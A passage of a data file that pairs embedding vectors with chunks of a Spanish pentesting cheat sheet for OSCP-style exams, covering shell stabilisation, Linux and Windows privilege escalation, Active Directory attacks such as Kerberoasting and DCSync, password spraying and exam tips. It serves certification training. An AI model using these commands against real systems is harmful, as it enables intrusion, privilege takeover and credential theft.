0.19054, -0.07918, -0.05127, 0.03251, 0.00948, 0.00277, -0.13965, -0.04138, 0.00371, -0.14961, 0.05047, -0.0117, -0.0051, 0.14532, -0.1192, -0.0244, -0.03301, 0.00088, 0.0585, -0.00782, -0.06206, 0.04462, -0.04143, 0.10597, -0.05306, -0.07489, 0.02926, -0.10299, 0.0281, -0.03386, -0.13547, 0.01929, -0.03747, 0.05676, -0.12767, 0.02687, 0.09809, -0.05984, -0.08051, -0.10726, 0.03587, -0.00695, -0.14671, 0.01935, -0.02481, -0.02312, -0.04114, 0.03128, 0.02315, -0.00938, 0.05404, 0.00582, -0.10365, 0.03909, -0.03079, 0.01625, -0.08078, 0.01702, -0.02692, -0.0225, -0.0134, 0.13477, -0.00486, 0.08168, 0.03749, 0.00999, 0.00994, 0.08867, -0.02504, 0.03537, -0.08196, -0.04246, 0.03976, -0.03153, 0.05286, 0.07805, -0.06763, -0.03341, -0.07421, -0.0924, 0.04668, 0.02294, -0.00126, 0.01037, 0.07133, 0.00034, -0.03098, 0.01851, 0.0077, -0.05509, -0.01948, -0.01117, 0.10357, 0.10119, 0.02016, 0.00845, 0.05006, -0.07832, -0.01214, 0.02575, 0.05135, 0.11982, 0.04928, 0.04765, -0.05187, -0.10057, 0.00199, 0.01362, 0.07942, 0.00738, -0.03063, -0.01887, -0.04791, 0.02483, -0.06243, -0.05833, 0.02265, 0.01008, 0.10922, 0.06401, 0.07461, -0.01082, 0.03249, 0.01629, -0.03343, 0.02494, -0.01335, 0.01014, 0.04341, -0.01739, -0.05493, -0.02497, -0.04033, 0.0235, -0.02942, 0.04511, 0.02022, 0.05249, -0.02809, 0.05993, 0.06439, -0.04491, -0.06081, -0.03289, -0.00857, 0.01135, -0.03522, -0.01864, 0.02846, -0.04745, 0.03568, 0.01865, 0.01792, -0.01761, 0.02302, 0.0136, 0.02931, -0.01929, 0.05618, -0.00248, -0.04644, -0.00575, -0.04891, 0.03822, 0.03467, -0.0486, -0.00715, 0.03939, -0.03506, 0.0398, -0.03778, -0.04184, -0.02366, 0.01303, 0.04974, 0.00982, 0.01215, -0.02984, 0.03962, 0.0758, -0.0416, 0.05152, 0.01577, 0.03908, -0.00975, 0.02485, -0.02168, 0.0101, -0.00037, -0.01608, -0.05924, 0.02274, -0.01501, -0.03986, -0.00326, -0.02934, -0.08728, 0.00475, 0.05104, -0.03224, -0.06323, -0.03694, -0.03431, -0.07281, 0.02197, 0.00947, -0.02442, -0.02468, 0.00937, 0.0085, -0.06293, -0.01831, -0.02135]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "## Trampas de shell\n\n```\n─ Shell rota = tortura ────────────────────────────────────\n python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n Ctrl+Z\n stty raw -echo; fg\n export TERM=xterm\n stty rows 40 columns 120\n (rows/cols los sacas con \"stty size\" en TU kali)\n\n─ Listener equivocado ────────────────────────────────────\n nc clásico para Linux victim\n ncat --ssl para evitar IDS\n stty raw -echo + nc para Windows ConPtyShell\n\n─ Egress filtering ───────────────────────────────────────\n El firewall del objetivo bloquea ciertos puertos\n PRUEBA: 80, 443, 8080, 53, 4444. Si nada, ICMP shell.\n```\n\n---", "v": [-0.08804, -0.14017, 0.06563, -0.05627, 0.06345, -0.22097, 0.01286, -0.03826, 0.1237, 0.12164, -0.20259, -0.0005, 0.07883, -0.03013, -0.04, -0.11349, -0.15649, -0.08496, -0.01126, -0.00706, -0.11405, -0.02633, -0.10721, -0.08982, 0.0341, 0.09102, -0.1997, 0.10293, -0.10637, 0.03831, -0.01181, -0.01468, -0.095, 0.00358, -0.02232, -0.01184, -0.03328, -0.02578, -0.00954, 0.22308, -0.06723, -0.00373, -0.17824, 0.11323, 0.02602, -0.14344, 0.02896, 0.02613, 0.02584, -0.0887, -0.10386, -0.03408, -0.07772, -0.02423, 0.04078, -0.00017, 0.09375, -0.02655, 0.00538, -0.02672, -0.03208, 0.02522, 0.01512, -0.00295, 0.02776, -0.08763, -0.02617, -0.13481, -0.08212, 0.0186, -0.09741, -0.11088, -0.03734, -0.1589, 0.08159, -0.05231, -0.01761, -0.09252, 0.05096, 0.05917, 0.00727, -0.13655, -0.03504, -0.01022, -0.03927, -0.10462, 0.00299, -0.04219, -0.0136, -0.00509, 0.04313, 0.03435, -0.04174, 0.04632, 0.03411, -0.08202, 0.03142, 0.02633, 0.04448, -0.08785, 0.03281, -0.03383, -0.07304, 0.02468, 0.03394, 0.04853, -0.02705, -0.00789, 0.05656, 0.04119, 0.07238, -0.03774, 0.05177, -0.11746, -0.0252, 0.00546, -0.08008, -0.01823, 0.12921, -0.03698, -0.04765, -0.03179, -0.08565, 0.06562, -0.01834, -0.03611, -0.03066, 0.09413, -0.03925, -0.00417, 0.07881, -0.00853, -0.0196, -0.03846, 0.00107, 0.11398, 0.06718, -0.05924, 0.01763, 0.00159, -0.08556, 0.02303, 0.01205, 0.04018, 0.11969, 0.0372, 0.01111, -0.06119, -0.04666, -0.02412, 0.07354, 0.0839, -0.03564, 0.0022, -0.03846, -0.04814, 0.02192, -0.0614, 0.00197, -0.00454, 0.01556, 0.05032, 0.02482, 0.05054, 0.0225, 0.04943, -0.02443, -0.02431, 0.02945, -0.01517, -0.00188, 0.07557, -0.00719, -0.03214, -0.04953, -0.06957, 0.04664, 0.02463, 0.0424, 0.00195, -0.01377, -0.00075, 0.03754, -0.03114, -0.01203, -0.04987, -0.05851, 0.02991, 0.04651, 0.03349, 0.04266, 0.0467, -0.09942, -0.05103, -0.02379, 0.04271, 0.01399, 0.01045, 0.02015, 0.00298, -0.02286, 0.08914, 0.07981, -0.11662, 0.03745, 0.00716, -0.06063, 0.02011, 0.00638, -0.00927, 0.07183, -0.03157, 0.04426, -0.01007, -0.06253, -0.03914, -0.00876, 0.04644, 0.01393, 0.03136, -0.03339, 0.03271, 0.06595, 0.03104, 0.02315, 0.03026, 0.02702, -0.01855, 0.03958, -0.07222, 0.00265, 0.03218, -0.0215, -0.04903, 0.02581, -0.02501, -0.03742, -0.00205, -0.03356, -0.05736, 0.03371, 0.05988, -0.02327, -0.04684, 0.00011, -0.02823, -0.05503, 0.03805, 0.01384, -0.00825, -0.00084, 0.00643, -0.00427, -0.0698, 0.00965, -0.03618]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "## Privesc Linux — los 10 olvidados\n\n```\n1. SUID exóticos → find / -perm -4000 2>/dev/null\n (y luego GTFOBins cada uno)\n2. sudo -l → SIEMPRE primero, sin password\n3. Capabilities → getcap -r / 2>/dev/null\n (cap_setuid en python/perl = root)\n4. Cron escribibles → cat /etc/crontab, /var/spool/cron\n Scripts que tú puedes editar\n5. Wildcard injection→ \"tar czf /backup/* \" con file --checkpoint\n6. PATH abuse → si un script SUID llama \"ps\" sin ruta\n absoluta, creas ./ps malicioso\n7. NFS no_root_squash→ showmount -e ; montas y subes SUID\n8. Docker group → si estás en grupo \"docker\", eres root:\n docker run -v /:/mnt -it alpine chroot /mnt\n9. Kernel exploits → último recurso. DirtyCow, DirtyPipe\n (uname -a; searchsploit kernel x.x)\n10. Caps de archivo → /var/backups, /etc/passwd escribible,\n /etc/shadow legible\n```\n\n---", "v": [-0.05331, -0.29467, -0.20966, -0.07614, -0.01206, -0.23905, -0.01813, 0.00362, -0.02247, 0.0529, -0.16193, -0.12038, 0.03253, -0.19419, -0.05817, -0.11689, -0.10318, -0.08377, 0.03228, 0.07685, -0.07576, 0.02042, -0.02908, -0.0706, 0.02241, 0.1721, 0.04128, 0.1084, -0.11575, 0.00126, 0.02511, 0.02202, 0.0002, -0.04236, -0.06988, -0.05054, 0.06539, 0.03188, -0.00619, 0.23822, -0.05486, 0.05594, -0.12715, 0.18309, 0.01495, -0.15002, -0.00893, 0.04459, 0.02453, -0.02903, 0.00497, -0.06468, -0.11421, -0.07474, -0.03205, -0.00965, 0.13442, -0.13533, -0.02254, 0.03237, -0.07075, 0.08333, -0.04756, -0.03896, 0.07881, -0.09066, -0.03078, -0.03793, -0.11704, 0.11635, -0.06883, 0.06511, 0.00523, -0.04042, 0.07241, -0.05322, 0.04776, -0.0359, 0.06962, 0.09215, -0.0288, -0.01793, -0.0341, 0.02386, -0.09725, -0.09511, 0.00064, 0.00865, -0.01876, -0.021, 0.07165, -0.00162, 0.01505, 0.01566, 0.03857, -0.08683, 0.02359, 0.06775, -0.0005, -0.0311, -0.04677, 0.03508, -0.01398, 0.1001, 0.04402, -0.00205, 0.04787, 0.02421, 0.01559, 0.01239, 0.08278, 0.05678, 0.02602, -0.00249, -0.03964, -0.00301, -0.08569, 0.00634, 0.0745, -0.02302, 0.0284, -0.01568, -0.02173, -0.00959, 0.01111, -0.0625, -0.00954, 0.08162, 0.03607, 0.03825, 0.00302, 0.03024, 0.00857, -0.03224, -0.06714, 0.0801, 0.04308, 0.02828, 0.00267, -0.07052, 0.01639, -0.01027, 0.01947, 0.04089, 0.09098, -0.00528, 0.01831, -0.10213, -0.01838, 0.05956, -0.01352, 0.02259, -0.00617, 0.00065, -0.08881, -0.00834, 0.02984, -0.05368, -0.05034, 0.01541, -0.00921, 0.00843, -0.00242, 0.03495, -0.04027, -0.03952, 0.06486, -0.03934, 0.01044, -0.00102, -0.02008, 0.00802, -0.02225, -0.06366, 0.01199, -0.10556, 0.08176, -0.06786, 0.00357, -0.03471, 0.0774, -0.07585, 0.0445, 0.03662, -0.00407, -0.06079, 0.03164, 0.01874, 0.02322, -0.01593, 0.00425, 0.02865, 0.038, -0.01879, 0.03281, -0.00269, -0.0121, -0.00613, -0.00566, 0.02029, -0.0387, 0.01724, -0.04223, 0.02199, -0.00692, -0.0035, -0.0121, -0.00064, -0.0496, 0.0006, 0.01692, 0.01319, 0.00348, -0.01021, -0.08702, -0.03377, -0.01847, 0.08085, 0.00282, -0.00179, -0.02794, 0.08117, 0.07641, 0.02932, -0.00716, -0.02262, 0.00113, -0.03078, 0.00703, 0.01476, -0.03019, 0.06334, 0.0243, -0.01091, 0.03004, -0.03258, -0.00966, -0.02164, -0.00456, -0.0216, -0.00425, 0.03071, 0.01525, -0.05425, -0.07943, -0.01073, -0.03863, 0.03287, -0.00341, -0.01793, -0.02522, -0.02072, -0.0225, -0.07785, -0.02142, 0.0155]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "## Privesc Windows — los 10 olvidados", "v": [0.05724, -0.07751, -0.0183, -0.1026, -0.00261, 0.01251, 0.01027, -0.13454, 0.01138, -0.10504, 0.16597, -0.00274, 0.02443, -0.02011, -0.06304, -0.02842, 0.01708, 0.01978, 0.01567, 0.08964, -0.01915, 0.09396, 0.01472, 0.03704, -0.00217, 0.00192, -0.01236, 0.05133, -0.08657, -0.02286, -0.08939, -0.01945, -0.05504, -0.08676, 0.02377, 0.11122, 0.04186, 0.0487, 0.03593, 0.0983, 0.20037, 0.22767, 0.02325, 0.11152, 0.1217, -0.11782, 0.03595, 0.08422, 0.06807, -0.06633, -0.10921, -0.05955, -0.04106, -0.08253, 0.07035, 0.0321, 0.07867, -0.00162, 0.01692, 0.02705, -0.04293, 0.13982, 0.05786, 0.04754, 0.07674, -0.06529, 0.03597, 0.04055, 0.0113, 0.11711, -0.03061, 0.0025, 0.11129, -0.01766, 0.08153, -0.02976, 0.05554, -0.07131, 0.07798, 0.00555, -0.03066, 0.01514, 0.06859, -0.19474, -0.02385, -0.08192, -0.04364, 0.12327, -0.02511, -0.08685, 0.07128, -0.08817, -0.16936, 0.08363, -0.01068, -0.00465, -0.00692, 0.07645, 0.01988, 0.13118, 0.02562, -0.01356, -0.02075, 0.04271, 0.02111, 0.06831, -0.01068, -0.04467, -0.06379, 0.06904, 0.06515, 0.06188, -0.02, -0.00732, -0.04467, 0.02622, -0.05179, -0.09169, 0.05691, 0.02084, -0.01999, -0.012, 0.00541, -0.11892, 0.00952, -0.02167, -0.05301, 0.08916, -0.02318, -0.01023, 0.01847, 0.05581, 0.01053, -0.05695, -0.08497, 0.10269, 0.00729, 0.06885, 0.00694, -0.0448, 0.15151, 0.07333, -0.00378, -0.03605, 0.01345, 0.04198, 0.14458, 0.03325, -0.05681, -0.02051, -0.01645, -4e-05, 0.00385, -0.02918, -0.05962, 0.00449, 0.03211, 0.07235, 0.05305, -0.06076, -0.00175, 0.03717, -0.05776, -0.04683, 0.02919, 0.04562, 0.04538, 0.04616, 0.04888, -0.0512, 0.00226, -0.0027, -0.07623, -0.04365, -0.05049, -0.00109, 0.08834, -0.04426, -0.07223, 0.02383, -0.06715, -0.05377, -0.009, 0.05016, 0.04191, -0.01439, -0.01995, -0.01134, -0.05882, -0.00395, -0.06401, -0.0949, 0.13871, 0.00641, 0.04921, 0.00838, -0.02248, 0.01261, 0.05792, 0.00433, 0.03897, 0.01621, 0.03539, -0.02334, 0.05744, -0.03435, 0.02858, 0.0356, 0.06284, 0.0421, 0.00086, 0.00297, -0.05979, -0.08323, -0.00631, -0.06846, -0.03477, -0.05592, -0.00837, -0.06205, 0.02753, 0.0237, 0.04393, 0.0089, -0.04385, 0.02169, -0.06386, 0.05399, -0.02094, -0.05337, -0.05372, 0.0702, -0.04583, 0.01613, 0.02322, 0.04985, 0.00508, -0.05753, -0.0534, 0.02321, -0.08923, 0.09918, -0.00916, -0.05623, -0.10153, -0.05694, 0.04363, -0.01218, -0.05934, -0.07037, 0.03852, -0.07853, 0.02994, -0.05986, -0.00194, 0.05575]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "```\n1. whoami /priv → busca SeImpersonate, SeAssignPrimaryToken\n → JuicyPotato, PrintSpoofer, GodPotato\n2. Unquoted services → wmic service get name,pathname,startmode\n Path con espacios sin comillas + carpeta\n escribible = exe propio\n3. AlwaysInstallElev → reg query HKLM\\Software\\Policies\\Microsoft\\\n Windows\\Installer\n Si ambos = 1 → msi propio = SYSTEM\n4. Service permisos → accesschk.exe -uwcqv user *\n SERVICE_CHANGE_CONFIG = ownership\n5. Credenciales en disco→ recurse find:\n Unattend.xml, sysprep.inf, web.config,\n cmdkey /list, registry SAM/SYSTEM\n6. AutoLogon en regis→ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\\n CurrentVersion\\Winlogon\n7. Pass spraying → la misma pass del user normal contra\n admin, administrator, sa, sysadmin\n8. WSL / OpenSSH server → veces hay credenciales en .bash_history\n9. Scheduled tasks → schtasks /query /fo LIST /v\n Tareas con scripts editables\n10. UAC bypass + token impersonation\n```\n\n---", "v": [-0.13539, -0.07183, -0.11444, -0.21851, 0.07229, -0.28183, -0.14699, -0.12971, -0.05605, 0.04128, -0.15798, -0.0929, 0.02015, -0.10028, 0.02263, 0.05067, 0.05462, -0.10849, -0.02205, 0.04812, 0.00882, 0.04785, -0.05972, 0.01502, 0.07135, 0.11852, 0.00832, -0.05765, -0.16829, -0.0286, 0.03047, 0.03096, -0.03789, -0.03744, 0.02045, -0.06394, -0.04484, 0.09203, 0.04519, 0.20193, 0.07512, 0.03315, -0.1001, 0.17155, 0.08194, -0.09217, 0.11596, -0.01616, 0.09515, -0.09326, -0.06262, -0.10852, -0.13676, -0.05696, 0.10165, -0.05104, 0.09026, -0.10124, -0.08532, 0.02123, -0.05941, 0.07027, -0.01025, 0.00508, 0.0262, 0.01725, 0.11598, -0.11216, -0.01538, 0.14488, -0.12425, -0.02745, 0.03565, -0.0582, 0.06252, -0.03402, -0.01862, -0.07717, 0.09812, 0.05672, -0.04786, -0.05201, -0.06543, -0.08006, -0.02106, -0.0897, -0.003, -0.02519, 0.01784, -0.03926, 0.14708, -0.05387, -0.03137, 0.07431, 0.06399, -0.06156, 0.00327, -0.01872, 0.02209, 0.02238, -0.00067, -0.0577, -0.03248, 0.13449, -0.0257, 0.06714, 0.06156, -0.06871, -0.01308, -0.0273, 0.0782, -0.00197, 0.02213, 0.00673, -0.01557, -0.02319, -0.02116, -0.0009, -0.02976, -0.00036, 0.00352, -0.05751, -0.0162, -0.0011, 0.02524, -0.05943, -0.00486, 0.11434, -0.0846, 0.01957, 0.04959, -0.01318, -0.07513, -0.05177, -0.0184, 0.06261, 0.02259, 0.0322, 0.02048, -0.02374, 0.09748, 0.1008, 0.05807, 0.06688, 0.09604, 0.02767, 0.05097, -0.0042, -0.02901, 0.02006, 0.02933, 0.03841, 0.01362, 0.04276, -0.04013, 0.00468, 0.01412, -0.008, -0.02299, -0.02187, 0.02418, 0.05485, 0.02748, 0.01878, -0.0244, -0.00808, 0.00601, -0.00718, 0.02771, -0.03681, -0.02092, 0.04594, -0.05101, -0.08281, -0.03341, -0.06626, 0.03498, -0.04878, 0.00749, -0.02004, -0.03567, -0.05423, 0.03984, 0.02313, -0.05017, -0.03555, 0.01082, 0.00099, -0.02951, -0.00416, 0.0059, 0.05541, 0.00974, -0.02578, 0.00502, -0.00153, -0.02929, -0.01926, -0.00915, 0.00098, -0.06035, 0.03072, -0.04608, -0.0203, 0.05475, 0.01219, 0.02154, 0.06949, -0.03853, 0.044, 0.02266, -0.0027, 0.03036, -0.03267, -0.05067, -0.06658, 0.05598, -0.00987, 0.00481, -0.01209, 0.0052, 0.04403, 0.05564, -0.03347, 0.00712, -0.00238, 0.01448, -0.02473, 0.05469, 0.02279, -0.03007, 0.0198, 0.00919, -0.04369, 0.03546, -0.00037, 0.01205, -0.05967, -0.02078, -0.0254, 0.02658, 0.03819, 0.02055, -0.09587, -0.07452, -0.03871, -0.02363, -0.00396, 0.02823, -0.00857, -0.01449, 0.02767, -0.00859, -0.07057, 0.0086, -0.00614]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "## Active Directory — los 7 caminos que SIEMPRE pruebas\n\n```\n1. Anonymous SMB → smbclient -L //IP -N\n nxc smb IP -u \"\" -p \"\"\n2. AS-REP Roasting → impacket-GetNPUsers dominio/ -usersfile users.txt -no-pass\n (usuarios con \"Do not require pre-auth\")\n3. Kerberoasting → impacket-GetUserSPNs dominio/user:pass -request\n (cuentas de servicio con SPN)\n4. GPP cpassword → buscar en \\\\DC\\SYSVOL\\\\Policies\\\n Groups.xml con cpassword (rotos en clave AES fija)\n5. LAPS → nxc ldap IP -u u -p p --module laps\n6. ACL abuses → BloodHound te los pinta:\n GenericAll, WriteDACL, AddMember, ForceChangePassword\n7. DCSync → con permisos DS-Replication, dumpear todo el dominio\n```\n\n---", "v": [-0.07091, -0.15469, -0.11271, -0.20088, -0.00962, -0.21172, -0.01331, -0.07868, -0.18029, 0.21071, 0.0083, -0.08768, -0.02429, -0.2708, -0.07444, -0.09617, -0.0373, -0.02072, -0.06581, -0.02433, -0.03059, 0.0056, -0.13309, -0.06716, 0.08452, 0.15358, -0.00141, -0.00319, -0.0435, 0.03084, -0.031, -0.10267, -0.0611, -0.02255, -0.04787, -0.13162, -0.04455, 0.05067, 0.13227, 0.21145, 0.07608, 0.05342, -0.20173, 0.07567, -0.06705, 0.0, 0.008, 0.00125, -0.00695, -0.1447, -0.08725, -0.01123, -0.18077, -0.03273, -0.10733, 0.02248, 0.11751, -0.04393, -0.10478, 0.00596, -0.04013, 0.07466, -0.0237, -0.00398, 0.01343, -0.07626, 0.01836, -0.02785, -0.07772, 0.06244, -0.0417, 0.04115, 0.05315, 0.00071, 0.07861, -0.10398, 0.07094, -0.08341, 0.10692, 0.08664, 0.03389, -0.01081, -0.14111, -0.03135, -0.04329, -0.06052, 0.0591, -0.13106, 0.08295, -0.01822, 0.09977, 0.03719, 0.00473, 0.07007, 0.04088, -0.0773, 0.00699, -0.00256, -0.00535, -0.0562, 0.01718, 0.08187, -0.07212, 0.05828, -0.00472, 0.02481, 0.08072, -8e-05, 0.0445, 0.00395, 0.0878, 0.0359, 0.01306, -0.02468, 0.01655, 0.04363, -0.02611, -0.04997, 0.01148, -0.03654, 0.03658, -0.02167, -0.00871, -0.01911, -0.03016, 0.04272, 0.05116, 0.03851, -0.02694, -0.03463, -0.00055, -0.03441, -0.03857, 0.00912, 0.01033, 0.00979, 0.00099, 0.00273, -0.03076, 0.01864, -0.00238, 0.00743, 0.04187, 0.10379, 0.042, -0.02423, 0.02911, -0.06118, -0.03828, 0.03455, 0.03043, -0.00102, -0.0585, 0.02555, -0.03146, 0.0194, -0.01394, -0.03882, -0.04951, 0.07096, -0.0311, 0.04883, 0.00513, 0.03821, -0.00492, -0.00737, 0.00224, -0.01324, 0.02227, -0.0318, -0.01182, -0.03055, 0.00035, -0.04404, -0.01925, -0.07725, 0.04253, -0.0255, -0.00237, -0.04946, -0.02578, -0.06143, 0.00247, 0.07512, -0.02993, -0.05913, 0.03988, -0.01269, 0.01226, -0.03337, 0.00626, 0.06687, 0.03471, 0.00366, 0.02254, -0.04618, -0.00655, -0.03342, -0.02298, -0.02597, -0.03137, -0.00049, -0.04693, -0.00034, -0.0002, -0.0211, 0.03955, 0.07288, -0.0153, -0.03444, 0.00555, -0.02504, 0.01101, -0.07008, -0.05405, -0.01032, -0.01642, 0.01786, -0.04017, 0.02271, -0.03538, 0.06732, 0.01401, -0.01154, 0.00794, 0.04621, 0.00383, -0.05719, 0.06306, 0.00428, -0.02482, 0.04383, -0.02237, -0.01834, 0.04308, -0.00128, -0.05566, -0.0066, -3e-05, 0.01653, -0.02331, -0.01838, 0.00652, -0.01833, -0.0534, -0.02732, -0.03499, -3e-05, 0.02341, 0.0098, -0.00085, -0.04139, -0.06175, -0.03035, -0.02886, -0.007]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "## Trampas de \"examen real\" (anti-pánico)\n\n```\n─ Time management ────────────────────────────────────────\n 24h ≠ 24h. Duermes 6h. Comes. Te duchas.\n Regla: 1.5h sin progreso = cambia de máquina.\n Cierra y vuelve más tarde con cabeza fresca.\n\n─ Documentación EN VIVO ──────────────────────────────────\n Captura TODO con Flameshot/Greenshot mientras lo haces.\n No al final. Al final no recuerdas el comando exacto.\n Cada flag con hostname visible (ipconfig/ifconfig).\n local.txt = user proof, proof.txt = root proof.\n\n─ Reutilización de credenciales ──────────────────────────\n La pass del usuario A muchas veces vale para usuario B.\n PRUEBA siempre cada pass que pillas contra TODOS los hosts.\n\n─ El AD set es 40 puntos seguidos ────────────────────────\n 3 máquinas encadenadas. Si te atascas en máquina 1,\n no avanzas en 2 y 3. Empieza por ahí con tiempo.\n\n─ Standalones independientes ─────────────────────────────\n 3 máquinas independientes de 20pts cada una.\n user (10pt) + root (20pt). Saca user de las 3\n ANTES de obsesionarte con root de una.", "v": [-0.10967, 0.03067, 0.0062, 0.0447, 0.07264, -0.13679, -0.03219, -0.0448, 0.02204, 0.07941, -0.21015, -0.07706, -0.01321, 0.0095, 0.0048, -0.06781, -0.04686, -0.04491, -0.0062, 0.01014, -0.01545, -0.0234, -0.0825, -0.07196, 0.11768, 0.10102, -0.05291, 0.07531, -0.21674, 0.02114, 0.04244, 0.05712, -0.1213, 0.01453, -0.06484, -0.04512, -0.05524, 0.02578, 0.02399, 0.21485, -0.05897, 0.08534, -0.13403, 0.1666, 0.02368, -0.03408, -0.00134, 0.03816, -0.08549, -0.1125, -0.09098, -0.03672, 0.00329, 0.03864, -0.04919, -0.03035, 0.17174, -0.0468, -0.06051, -0.11189, 0.00324, 0.0826, 0.04321, 0.00517, 0.04285, -0.07577, 0.04419, -0.11118, -0.01676, -0.02802, -0.14933, -0.03275, 0.00355, -0.18573, 0.05131, -0.06573, 0.06634, -0.07108, 0.05175, 0.07806, -0.01054, -0.10635, -0.15748, -0.0711, -0.06071, -0.15825, 0.04257, -0.12656, -0.02348, 0.00997, 0.03867, 0.08171, 0.04432, 0.05084, 0.06128, -0.09738, 0.11558, -0.01278, 0.05275, -0.04182, 0.10884, 0.01449, -0.07588, 0.01976, 0.03255, 0.01866, 0.04496, 0.01843, 0.02685, 0.02268, 0.04716, 0.00506, 0.02132, -0.01562, -0.00895, 0.00556, -0.03637, 0.03652, 0.07884, -0.02824, -0.06732, -0.04963, 0.0218, 0.04023, 0.02488, -0.04848, -0.01065, 0.07479, 0.06316, -0.01206, 0.01742, 0.03527, -0.03902, -0.03327, -0.0098, 0.0692, 0.02113, 0.03751, -0.02126, -0.00985, -0.00649, -0.01047, -0.00256, 0.02221, 0.10042, 0.06464, 0.01044, -0.12741, -0.0989, 0.04643, 0.0128, 0.07626, -0.00532, 0.03195, -0.04057, 0.00619, 0.00888, -0.06397, -0.04921, 0.08628, -0.03142, 0.02136, 0.0132, 0.04454, -0.00258, 0.05803, 0.01404, 0.05802, 0.034, 0.0019, -0.00976, 0.04141, -0.08197, 0.00532, -0.01157, -0.08327, 0.05487, -0.01944, 0.04427, 0.0239, -0.00061, 0.01505, 0.0508, -0.00187, -0.01637, -0.00839, -0.05327, 0.01514, 0.10013, -0.00661, 0.03528, 0.02882, -0.07992, 0.02592, 0.05801, -0.01791, 0.0365, 0.02482, 0.01338, 0.0218, -0.02821, 0.09754, -0.01197, -0.06051, 0.01761, 0.02239, -0.02232, 0.01251, -0.0318, 0.01864, 0.00904, 0.03757, 0.05395, -0.062, -0.05603, -0.06183, 0.0474, 0.01357, -0.04227, -0.02793, 0.02863, 0.01573, 0.06664, -0.02639, 0.02131, 0.01762, 0.07511, 0.01514, 0.11129, -0.02307, -0.01551, 0.04847, 0.00863, -0.09263, 0.0304, -0.00934, -0.01609, -0.03845, -0.05387, -0.10314, 0.01247, 0.08455, 0.00831, -0.08616, -0.07487, 0.01849, -0.09035, -0.01006, 0.02058, -0.01935, -0.04125, 0.06973, 6e-05, -0.0577, 0.03781, -0.03825]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "─ Reporte cuenta ─────────────────────────────────────────\n Sin reporte, no apruebas, aunque saques 100 puntos\n técnicos. 24h después del examen. Markdown template:\n https://github.com/noraj/OSCP-Exam-Report-Template-Markdown\n\n─ Metasploit limitado ────────────────────────────────────\n Puedes usarlo solo en UNA máquina.\n meterpreter post-explotation no cuenta como \"uso\"\n solo el initial foothold cuenta.\n```\n\n---", "v": [-0.21065, 0.07287, 0.05809, -0.07441, 0.08833, -0.256, -0.09127, -0.06522, -0.0638, 0.01463, -0.2259, -0.07226, 0.03136, 0.0442, 0.00076, -0.03729, -0.00198, -0.0736, -0.05349, -0.05205, -0.00225, -0.09539, -0.04805, -0.09769, 0.07176, 0.08288, -0.12009, 0.02634, -0.09427, -0.03598, -0.00166, 0.03452, -0.17605, 0.03194, -0.02436, -0.04889, 0.0392, -0.05786, 0.05043, 0.20463, -0.06284, -0.01267, -0.11692, 0.07355, 0.07086, -0.08558, 0.03832, 0.09925, -0.15394, -0.05442, -0.02479, 0.01825, -0.0382, 0.09844, -0.03855, 0.0117, 0.16568, 0.02478, -0.01664, -0.09589, 0.08929, 0.03041, 0.04846, -0.08054, 0.04676, -0.06939, 0.04947, -0.0434, -0.09247, 0.01495, -0.08896, -0.04458, 0.03692, -0.16291, 0.00136, -0.0466, 0.01184, -0.10201, -0.05663, 0.02596, -0.03832, -0.09808, -0.10244, 0.02439, -0.08292, -0.13442, 0.08287, -0.04319, -0.04458, -0.00073, -0.0261, 0.01683, -0.00264, 0.04964, -0.01185, -0.10923, 0.06879, 0.00895, 0.01312, -0.13984, 0.0763, -0.0737, 0.02269, -0.03711, 0.02589, 0.07649, 0.05619, 0.00544, -0.01706, -0.00811, 0.02326, 0.00142, 0.02987, -0.05069, -0.07867, 0.06017, -0.10833, 0.01551, 0.03497, 0.05479, -0.05351, 0.01572, 0.01347, 0.03799, -0.0149, -0.02771, 0.01184, 0.05959, 0.07907, -0.01343, 0.07702, 0.09505, -0.07932, -0.02134, -0.01901, 0.06107, 0.02185, -0.05596, -0.01715, -0.01476, -0.05193, -0.00187, 0.0153, 0.05192, 0.0621, 0.08092, -0.02511, -0.07164, -0.0935, 0.04856, 0.00053, 0.06992, -0.04651, 0.02718, -0.03291, -0.0434, -0.00026, -0.03433, -0.03681, 0.03975, -0.0309, 0.02404, 0.04772, 0.05831, 0.02807, 0.09483, 0.0763, 0.01587, 0.02113, 0.01364, -0.02863, 0.05441, 0.02406, -0.01096, 0.00822, -0.0656, 0.0646, -0.02101, 0.02605, 0.01999, -0.02, -0.00057, 0.0241, 0.03481, -0.0518, -0.03051, -0.05397, -0.00752, 0.06812, 0.03569, -0.01156, 0.0697, -0.08396, 0.00611, 0.01093, 0.02008, 0.04631, 0.06636, 0.05075, 0.01784, -0.00913, 0.04739, -0.02932, -0.06916, 0.03497, -0.00829, -0.05815, 0.04467, -0.04392, 0.00467, 0.01405, -0.09492, 0.03055, -0.07883, -0.05275, -0.03185, 0.03502, 0.02669, -0.01498, -0.03562, 0.00617, -0.02084, 0.09394, -0.02477, -0.00508, 0.02652, 0.05329, -0.04261, 0.01498, -0.04535, -0.01442, 0.00245, -0.02128, -0.07734, 0.02823, -0.00589, -0.00506, 0.01765, -0.05154, -0.04286, 0.01444, 0.09816, -2e-05, -0.03807, -0.08408, 0.01494, -0.05454, 0.01484, 0.01594, -0.05178, 0.03755, 0.02802, 0.03526, -0.02505, 0.01277, -0.01441]} +{"tipo": "metodologia", "herramienta": "trucos_trampas", "perfil": "PENTESTERS", "tema": "", "fichero": "conocimiento/trucos_trampas.md", "texto": "## Recursos públicos donde sí está todo esto\n\n| Recurso | Por qué importa |\n|---|---|\n| **TJ 